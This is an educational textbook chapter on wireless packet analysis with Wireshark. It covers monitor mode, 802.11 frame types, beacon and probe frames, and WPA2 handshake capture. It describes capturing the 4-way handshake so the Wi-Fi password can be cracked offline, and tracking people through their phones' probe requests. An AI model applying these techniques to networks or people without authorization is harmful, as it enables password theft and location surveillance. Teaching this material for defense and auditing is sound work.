Wireless Packet Analysis

# CHAPTER 14

Wireless Packet Analysis #

1. Introduction #

Until now, we have been analyzing Ethernet (802.3) traffic. However, the modern world is untethered. Analyzing traffic as it bounces invisibly through the air via radio frequencies introduces an entirely new layer of complexity. Wireless networks use the 802.11 standard, which requires specialized management packets just to maintain a connection before any real data can flow. In this chapter, we will transition our focus to Wireless Packet Analysis. We will explain the critical concept of "Monitor Mode," dissect 802.11 Beacon Frames, and outline the theoretical capture of the highly secure WPA2/WPA3 4-Way Handshake.

2. Learning Objectives #

By the end of this chapter, you will be able to:

• Explain the physical and software requirements for entering "Monitor Mode."

• Differentiate between 802.11 Management, Control, and Data frames.

• Identify Beacon Frames and extract the SSID of a wireless network.

• Understand the function of Probe Requests and Probe Responses.

• Describe the structure of a WPA2 4-Way encryption handshake.

3. The Hurdle: Monitor Mode #

When you open Wireshark on your laptop and capture on the "Wi-Fi" interface, you are capturing in "Promiscuous Mode." You will see *your* internet traffic, translated into standard Ethernet frames by your OS. You will NOT see raw wireless radio waves, and you will NOT see your neighbor's traffic.

To see the raw physics of Wi-Fi, your network card must support Monitor Mode.

• In Monitor Mode, the Wi-Fi card disconnects from your router. It simply listens to the raw radio frequency (e.g., Channel 6 on the 2.4GHz band) and captures *every single wireless frame* flying through the air, regardless of who it belongs to.

• *Note:* Most default Windows laptop Wi-Fi cards physically block Monitor Mode. Cybersecurity professionals use specialized USB Wi-Fi adapters (like Alfa Networks) running on Linux (Kali Linux) to achieve this.

4. Anatomy of 802.11 Frames #

When capturing in Monitor Mode, you no longer see Ethernet II in the Wireshark Details pane. You see 802.11 Radio Information and IEEE 802.11 Wireless LAN.

802.11 traffic is divided into three types:

1. 1. Management Frames: Used to establish and maintain connections (e.g., Beacons, Probes, Authentication).

1. 2. Control Frames: Used to assist in the delivery of data over the chaotic airwaves (e.g., Request-to-Send, Clear-to-Send).

1. 3. Data Frames: The actual payload (HTTP, TCP, IP).

5. Beacon Frames (The Heartbeat) #

Every Wi-Fi router constantly shouts into the void, 10 times a second: *"I am here! My name is 'Starbucks Wi-Fi'!"* These are Beacon Frames. If you filter Wireshark for wlan.fc.typesubtype == 8 (The specific code for Beacons), you will see hundreds of them. Expand the 802.11 Management Frame -> Tagged parameters. Here you will find the SSID (The network name), the supported data rates, and the encryption capabilities (e.g., WPA2).

6. Probe Requests (Your Phone is Snitching) #

When you walk into a coffee shop, how does your phone automatically connect to the Wi-Fi? Your phone is constantly sending out Probe Requests. It shouts: *"Is 'HomeNetwork' here? Is 'Starbucks Wi-Fi' here?"* If a router hears its name, it sends a Probe Response: *"Yes, I am here, let's connect."* *Forensic value:* By capturing raw Probe Requests in a public area, an analyst can see a literal list of every Wi-Fi network a person's phone has previously connected to, mapping out their life and travel history.

7. The WPA2 4-Way Handshake #

To connect securely to a modern Wi-Fi network, the laptop and the router must agree on encryption keys using the Wi-Fi password. This is called the EAPOL 4-Way Handshake. If a hacker is running Wireshark in Monitor Mode and captures these four specific packets as a legitimate user connects, the hacker can take that PCAP file offline and attempt to crack the Wi-Fi password using brute-force tools (like hashcat). Wireshark itself does not crack the password, but it is the essential tool used to steal the encrypted handshake required for the crack.

8. Best Practices #

• Channel Hopping: Wi-Fi operates on multiple frequencies (Channels 1-11 on 2.4GHz). A Wi-Fi card in Monitor mode can only listen to one channel at a time. If you are trying to capture traffic for your home router, you must explicitly lock your capture card to the specific channel your router is broadcasting on, otherwise, you will capture nothing but static.

9. Common Mistakes #

• Expecting to read WPA2 Payloads: A beginner buys a Monitor Mode USB adapter, captures their neighbor's traffic, and expects to see HTTP web history. They are disappointed to see everything labeled 802.11 Encrypted Data. WPA2/WPA3 encrypts the Data Frames at Layer 2. Without the Wi-Fi password, the payload is mathematically unreadable.

10. Mini Project: Filter Wi-Fi Traffic (Theory) #

If you have a sample raw 802.11 PCAP file (available on the Wireshark Wiki):

1. 1. Apply the filter wlan to see only wireless frames.

1. 2. Filter for Beacons: wlan.fc.typesubtype == 8.

1. 3. Expand the IEEE 802.11 wireless LAN header. Notice that wireless frames actually have *four* MAC addresses (Transmitter, Receiver, Source, Destination) to handle the complex bouncing of signals between access points.

1. 4. Expand the SSID parameter set to read the plaintext name of the Wi-Fi network.

11. Practice Exercises #

1. 1. Explain the operational difference between Promiscuous Mode and Monitor Mode regarding Wi-Fi packet capture.

1. 2. What is the primary function of an 802.11 Beacon Frame?

12. MCQs with Answers #

13. Interview Questions #

• Q: A security audit requires you to capture raw 802.11 management frames (Beacons and Probes). What hardware and software configuration is strictly required to accomplish this?

• Q: Describe the security vulnerability associated with smartphones continuously transmitting 802.11 Probe Requests in public spaces.

• Q: Explain the purpose of the WPA2 4-Way Handshake. From a penetration testing perspective, why is capturing these specific packets in Wireshark highly desirable?

14. FAQs #

Q: If I know the Wi-Fi password, can Wireshark decrypt the WPA2 traffic automatically? A: Yes. If you go to Wireshark Preferences -> Protocols -> IEEE 802.11, you can input the Wi-Fi password (WPA-PWD). If (and only if) you capture the initial 4-Way Handshake of a device connecting, Wireshark will use the password to decrypt the AES encryption and reveal the standard IP/TCP traffic underneath.

15. Summary #

In Chapter 14, we transitioned from the copper wire to the radio spectrum. We established the absolute necessity of hardware "Monitor Mode" to capture raw 802.11 wireless frames. We dissected the three categories of Wi-Fi traffic, focusing on the Management Frames that make wireless networking possible. We extracted SSIDs from Beacon Frames, mapped device history via Probe Requests, and acknowledged the immense security implications of capturing the WPA2 4-Way encryption handshake.

16. Next Chapter Recommendation #

We have analyzed the transport mechanisms. Now let's analyze complex real-time payloads. Proceed to Chapter 15: VoIP and Streaming Analysis.